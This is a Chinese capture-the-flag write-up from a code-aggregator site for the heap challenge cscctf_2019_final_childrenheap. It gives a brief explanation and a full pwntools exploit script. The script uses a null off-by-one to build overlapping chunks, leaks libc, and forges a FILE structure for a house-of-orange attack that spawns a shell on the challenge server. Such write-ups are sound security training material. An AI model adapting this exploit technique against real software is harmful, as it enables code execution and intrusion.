当前位置: 代码迷 >> 综合 >> cscctf_2019_final_childrenheap(house of orange)
  详细解决方案

cscctf_2019_final_childrenheap(house of orange)

热度:45   发布时间:2024-01-15 12:02:31.0

cscctf_2019_final_childrenheap

首先,检查一下程序的保护机制

然后用IDA分析一下

Update功能存在一个null off by one

禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。

利用null off by one,伪造chunk的prev_size和size,unsorted bin合并形成overlap chunk,从而控制住夹在中间的unsorted bin,然后就是常规的house of orange利用了,由于比较难泄露堆地址,我们就利用house of orange in 2.24的手法,让vtable为_IO_str_jumps_+xxx。

#coding:utf8
from pwn import *#sh = process('./cscctf_2019_final_childrenheap')
sh = remote('node3.buuoj.cn',29184)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
_IO_list_all_s = libc.symbols['_IO_list_all']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()def get_IO_str_jumps():IO_file_jumps_offset = libc.sym['_IO_file_jumps']IO_str_underflow_offset = libc.sym['_IO_str_underflow']for ref_offset in libc.search(p64(IO_str_underflow_offset)):possible_IO_str_jumps_offset = ref_offset - 0x20if possible_IO_str_jumps_offset > IO_file_jumps_offset:print possible_IO_str_jumps_offsetreturn possible_IO_str_jumps_offsetdef add(index,size,content):sh.sendlineafter('>>','1')sh.sendlineafter('Index:',str(index))sh.sendlineafter('Size:',str(size))sh.sendafter('Content:',content)def edit(index,content):sh.sendlineafter('>>','2')sh.sendlineafter('Index:',str(index))sh.sendafter('Content:',content)def show(index):sh.sendlineafter('>>','3')sh.sendlineafter('Index:',str(index))def delete(index):sh.sendlineafter('>>','4')sh.sendlineafter('Index:',str(index))add(0,0xF0,'a') #0
add(1,0xF8,'b') #1
add(2,0xF0,'c') #2
add(3,0x10,'d') #3delete(0)
#null off by one
edit(1,'d'*0xF0 + p64(0x100 + 0x100))
delete(2)
add(0,0xF0,'a')
show(1)
sh.recvuntil('content: ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'system_addr=',hex(system_addr)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)delete(0)
add(0,0x100,'a')
#通过1,可以完全控制unsorted bin,我们可以用house of orange
fake_file = p64(0) + p64(0x60)
fake_file += p64(0) + p64(_IO_list_all_addr - 0x10) #unsorted bin attack在_IO_list_all_addr写入main_arena地址
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针
fake_file += p64(_IO_str_jumps_addr - 8)
fake_file += p64(0) + p64(system_addr)
edit(1,fake_file)
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('Index:','7')
sh.sendlineafter('Size:',str(0x60))sh.interactive()

 

  相关解决方案